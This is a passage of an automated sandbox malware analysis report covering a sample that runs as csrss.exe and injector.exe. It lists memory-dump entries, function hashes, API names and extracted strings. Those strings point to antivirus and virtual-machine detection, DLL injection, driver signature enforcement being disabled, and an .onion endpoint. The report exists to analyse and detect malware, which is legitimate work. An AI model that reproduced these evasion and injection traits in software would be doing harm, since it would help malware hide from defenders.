                                                                      • Associated: 00000000.00000002.668916309.0000000000C9F000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.668923007.0000000000CA2000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.668929493.0000000000CA3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.668941083.0000000000CAA000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.668947679.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.668953565.0000000000CBB000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.668958488.0000000000CBD000.00000008.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                                      • API String ID: 0-2405844374
                                                                      • Opcode ID: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                                      • Instruction ID: 602d0d954225419760eac9a183926c9f5c22208bff9d0adb6c0c5b0f89df24a9
                                                                      • Opcode Fuzzy Hash: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                                      • Instruction Fuzzy Hash: F251F8B46097158FD340EF65D18575EBBE0FF88708F80892EE48887352DB389949DB96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00434690, Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                                      • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                                      • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                                      • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.665663316.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.665659500.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.666046544.000000000069F000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.666660726.000000000098A000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.667069636.00000000009FB000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.668850529.0000000000C53000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.668856780.0000000000C57000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.668904539.0000000000C9B000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.668910628.0000000000C9D000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.668916309.0000000000C9F000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.668923007.0000000000CA2000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.668929493.0000000000CA3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.668941083.0000000000CAA000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.668947679.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.668953565.0000000000CBB000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.668958488.0000000000CBD000.00000008.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                                      • API String ID: 0-626581767
                                                                      • Opcode ID: 6e96d87cef3c5bae39166ccbc9028f97707ed74f2647afd307d3e15fdb542bad
                                                                      • Instruction ID: 1013df02f7d93c665873b684ece9a7c5afc7bb6a550ead538736935ac93b2926
                                                                      • Opcode Fuzzy Hash: 6e96d87cef3c5bae39166ccbc9028f97707ed74f2647afd307d3e15fdb542bad
                                                                      • Instruction Fuzzy Hash: 9C51E4B4608705CFD344EF65D18575EBBE0BF88308F81896EE88887312D7799845CFA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: csrss.exe PID: 4612 Parent PID: 3176 csrss.exeCOMMON

                                                                      Executed Functions

                                                                      Non-executed Functions

                                                                      Function 00428B10, Relevance: 7.6, Strings: 6, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                                      • ", xrefs: 00428CF9
                                                                      • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                                      • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                                      • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                                      • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.925921551.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000A.00000002.925910867.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.927064951.000000000098A000.00000004.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.927094203.0000000000991000.00000008.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.927381307.00000000009FB000.00000008.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.927582239.0000000000A5B000.00000008.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.928677255.0000000000C53000.00000008.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.928706815.0000000000C57000.00000008.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.928797279.0000000000C9B000.00000004.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.928821062.0000000000C9D000.00000008.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.928839248.0000000000C9F000.00000004.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.928857596.0000000000CA2000.00000008.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.928869616.0000000000CA3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.928885135.0000000000CAA000.00000004.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.928898279.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.928910704.0000000000CBB000.00000004.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.928924936.0000000000CBD000.00000008.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                                      • API String ID: 0-2405844374
                                                                      • Opcode ID: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                                      • Instruction ID: 602d0d954225419760eac9a183926c9f5c22208bff9d0adb6c0c5b0f89df24a9
                                                                      • Opcode Fuzzy Hash: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                                      • Instruction Fuzzy Hash: F251F8B46097158FD340EF65D18575EBBE0FF88708F80892EE48887352DB389949DB96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00434690, Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                                      • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                                      • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                                      • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.925921551.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000A.00000002.925910867.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.927064951.000000000098A000.00000004.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.927094203.0000000000991000.00000008.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.927381307.00000000009FB000.00000008.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.927582239.0000000000A5B000.00000008.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.928677255.0000000000C53000.00000008.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.928706815.0000000000C57000.00000008.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.928797279.0000000000C9B000.00000004.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.928821062.0000000000C9D000.00000008.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.928839248.0000000000C9F000.00000004.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.928857596.0000000000CA2000.00000008.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.928869616.0000000000CA3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.928885135.0000000000CAA000.00000004.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.928898279.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.928910704.0000000000CBB000.00000004.00020000.sdmp Download File
                                                                      • Associated: 0000000A.00000002.928924936.0000000000CBD000.00000008.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                                      • API String ID: 0-626581767
                                                                      • Opcode ID: 6e96d87cef3c5bae39166ccbc9028f97707ed74f2647afd307d3e15fdb542bad
                                                                      • Instruction ID: 1013df02f7d93c665873b684ece9a7c5afc7bb6a550ead538736935ac93b2926
                                                                      • Opcode Fuzzy Hash: 6e96d87cef3c5bae39166ccbc9028f97707ed74f2647afd307d3e15fdb542bad
                                                                      • Instruction Fuzzy Hash: 9C51E4B4608705CFD344EF65D18575EBBE0BF88308F81896EE88887312D7799845CFA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: injector.exe PID: 1332 Parent PID: 4612 injector.exeCOMMON

                                                                      Executed Functions

                                                                      Function 00007FF6148827F0, Relevance: 56.3, APIs: 20, Strings: 12, Instructions: 258processsynchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ErrorLast$Create$CloseFirstHandleMutexOpenProcessProcess32SleepSnapshotToolhelp32
                                                                      • String ID: ID: $) terminated$, (pid: $DLL filename: $Global\qtxp9g8w$failed to inject DLL: $failed to open process: $failed to wait for an object: $injected$not enough arguments$process $process name:
                                                                      • API String ID: 1655518464-3362440526
                                                                      • Opcode ID: 811615c686dd7e2b8bf127d5529c178edcab6273597339bb3635e6138e25b633
                                                                      • Instruction ID: c1096fdcf5052783f386d3e1c5ff1f774a550a16c7b86983e29a0e2bac65211e
                                                                      • Opcode Fuzzy Hash: 811615c686dd7e2b8bf127d5529c178edcab6273597339bb3635e6138e25b633
                                                                      • Instruction Fuzzy Hash: B3B15E21A09E0741EA94EB26ECD41BA23A1AF87FB4F504135DA1EC73E6DF7CE4459340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF61488D8BC, Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 59578552-0
                                                                      • Opcode ID: 72b3a8404d0a84c89e3a6d66c54a9fe62843eebc84389721f4a6ca630a818792
                                                                      • Instruction ID: 35998d20d51529b7b687796f846f64ef573883b590e5e04788f380aa5b9ff34e
                                                                      • Opcode Fuzzy Hash: 72b3a8404d0a84c89e3a6d66c54a9fe62843eebc84389721f4a6ca630a818792
                                                                      • Instruction Fuzzy Hash: CFE0B631E5DD4382E5993A7988C20BC21901FCBB30FA00235E12DC32C2CD1EF5925B6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A31B0, Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6148A31F1
                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF6148A316F,?,?,FFFFFFFE,00007FF6148A2196), ref: 00007FF6148A32B0
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF6148A316F,?,?,FFFFFFFE,00007FF6148A2196), ref: 00007FF6148A3330
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 2210144848-0
                                                                      • Opcode ID: 26715ff7cc39d96f6d37d079edff232458c65da7b58ef50fd20d28b75933661f
                                                                      • Instruction ID: 6f939683216445652f4f2aba05db0152665e31555fb6dbf74714257cd4b5b923
                                                                      • Opcode Fuzzy Hash: 26715ff7cc39d96f6d37d079edff232458c65da7b58ef50fd20d28b75933661f
                                                                      • Instruction Fuzzy Hash: 7A81A022A18E1289FB909F69D4C06BD6760BF46FA4FA44136DA0E936E1DFFDE445C310
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A11E4, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: String$try_get_function
                                                                      • String ID: LCMapStringEx
                                                                      • API String ID: 1203122356-3893581201
                                                                      • Opcode ID: 05fa366c2c50fcaac7f6a3aea4bc55e8ad76e5a7ce2bd5e93f4c74efa4b9c7c3
                                                                      • Instruction ID: 9df2ce5cbd9501d40edeb404ae631e37353d8aea4c5e6e166185a16328ab3183
                                                                      • Opcode Fuzzy Hash: 05fa366c2c50fcaac7f6a3aea4bc55e8ad76e5a7ce2bd5e93f4c74efa4b9c7c3
                                                                      • Instruction Fuzzy Hash: 45113035608B8186D7A0CB45B48029AB7A5FBC9BD4F544135EECD83B69CF3CD440CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF61488D8D8, Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 1321466686-0
                                                                      • Opcode ID: b36c17e84833c21c762e081d6501b26afe2fad55a0ffcd1e741a5b10ca06fde9
                                                                      • Instruction ID: ac6e8e3465698d2dd5a3c9d64d8faaac132b46f1eb3c0a42e74228219b92cf4e
                                                                      • Opcode Fuzzy Hash: b36c17e84833c21c762e081d6501b26afe2fad55a0ffcd1e741a5b10ca06fde9
                                                                      • Instruction Fuzzy Hash: 89312E21A0CE4342FAD4AB25D4D13B922D1AF87FA4F944035EA4EC72E7DE6DE8469701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A643C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 125COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Info
                                                                      • String ID:
                                                                      • API String ID: 1807457897-3916222277
                                                                      • Opcode ID: 116468216eb2aa1a53ccbbaba1d54fe37ab03232ed46faac14ba305c4149df92
                                                                      • Instruction ID: 98834b7337f7930d30dbfc452ac27a2dcbb26a2bd0e3e1c35f5864a4e4c13f77
                                                                      • Opcode Fuzzy Hash: 116468216eb2aa1a53ccbbaba1d54fe37ab03232ed46faac14ba305c4149df92
                                                                      • Instruction Fuzzy Hash: 8651E432A1CA818AE790CF24D0843AD7BA0FB96B58F644135E6CD8769DCFACD545CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A6918, Relevance: 3.2, APIs: 2, Instructions: 194COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00007FF6148A632C: GetOEMCP.KERNEL32 ref: 00007FF6148A6356
                                                                      • IsValidCodePage.KERNEL32(?,?,?,?,00000000,?,?,00007FF6148A6703), ref: 00007FF6148A6983
                                                                      • GetCPInfo.KERNEL32(?,?,?,?,00000000,?,?,00007FF6148A6703), ref: 00007FF6148A69CF
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CodeInfoPageValid
                                                                      • String ID:
                                                                      • API String ID: 546120528-0
                                                                      • Opcode ID: 3ff8ca631ef86ca6f5c2971fb809097506687484789c91c91567844e6540621b
                                                                      • Instruction ID: dcde04cf8a1faa9b87cb06bdf3606fbe1879515b28aafdd8f7e72a446886518e
                                                                      • Opcode Fuzzy Hash: 3ff8ca631ef86ca6f5c2971fb809097506687484789c91c91567844e6540621b
                                                                      • Instruction Fuzzy Hash: E981E662E0CA4246F7E59F2594C017977A1BF92F68F688035C6CE932E8DEBDF5568300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A2D34, Relevance: 3.1, APIs: 2, Instructions: 74fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID:
                                                                      • API String ID: 442123175-0
                                                                      • Opcode ID: 2159cee63f332e5b4ef3014310ffb607f38b8ad07de57b11d7bdfdf344f7b23a
                                                                      • Instruction ID: 7e6efc48991eb253afd3e12cf501a5fa24bb3be231864460c26c65050e2bebd9
                                                                      • Opcode Fuzzy Hash: 2159cee63f332e5b4ef3014310ffb607f38b8ad07de57b11d7bdfdf344f7b23a
                                                                      • Instruction Fuzzy Hash: E631F532A18E958ADBA09F25E4806E977A0FF4ABA0F544032EB4DC37A5DF7CD552C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF61489FE48, Relevance: 3.1, APIs: 2, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
